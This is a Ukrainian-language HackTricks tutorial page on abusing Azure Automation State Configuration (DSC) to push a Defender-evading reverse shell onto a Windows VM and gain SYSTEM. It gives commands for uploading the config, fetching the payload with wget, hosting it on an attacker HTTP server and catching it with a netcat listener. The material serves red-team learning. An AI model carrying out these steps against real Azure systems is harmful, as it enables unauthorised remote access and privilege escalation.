Az - State Configuration RCE

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Перевірте повний пост за посиланням: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Огляд підготовки і кроки інфраструктури віддаленого сервера (C2)

Огляд

Процес включає налаштування віддаленої серверної інфраструктури для розміщення модифікованого пакету Nishang Invoke-PowerShellTcp.ps1, під назвою RevPS.ps1, призначеного для обхіду Windows Defender. Пакет обслуговується з машини Kali Linux з IP 40.84.7.74 за допомогою простого Python HTTP сервера. Операція виконується через кілька кроків:

Крок 1 — Створення файлів

  • Потрібні файли: Потрібні два сценарії PowerShell:

  1. reverse_shell_config.ps1: Файл конфігурації бажаного стану (DSC), який отримує та виконує пакет. Його можна отримати з GitHub.

  2. push_reverse_shell_config.ps1: Сценарій для публікації конфігурації на віртуальну машину, доступний на GitHub.

  • Налаштування: Змінні та параметри в цих файлах повинні бути налаштовані під конкретне середовище користувача, включаючи назви ресурсів, шляхи до файлів та ідентифікатори сервера/пакету.

Крок 2 — Архівування файлу конфігурації

  • Файл reverse_shell_config.ps1 стискається в архів .zip, щоб бути готовим для передачі до облікового запису Azure Storage.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Крок 3 — Встановлення контексту сховища та завантаження

  • Зазипований файл конфігурації завантажується до попередньо визначеного контейнера Azure Storage, azure-pentest, за допомогою команди Set-AzStorageBlobContent Azure.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Крок 4 — Підготовка Kali Box

  • Сервер Kali завантажує вантаж RevPS.ps1 з репозиторію GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
  • Сценарій редагується для вказання цільової віртуальної машини Windows та порту для зворотньої оболонки.

Крок 5 — Опублікувати файл конфігурації

  • Виконується файл конфігурації, що призводить до розгортання сценарію зворотньої оболонки за вказаною локацією на віртуальній машині Windows.

Крок 6 — Розміщення вантажу та налаштування прослуховувача

  • Запускається Python SimpleHTTPServer для розміщення вантажу, разом з прослуховувачем Netcat для захоплення вхідних підключень.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
  • Заплановане завдання виконує навантаження, досягаючи привілеїв рівня SYSTEM.

Висновок

Успішне виконання цього процесу відкриває безліч можливостей для подальших дій, таких як витягування облікових даних або розширення атаки на кілька віртуальних машин. Посібник підтримує продовження навчання та креативність у сфері Azure Automation DSC.

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated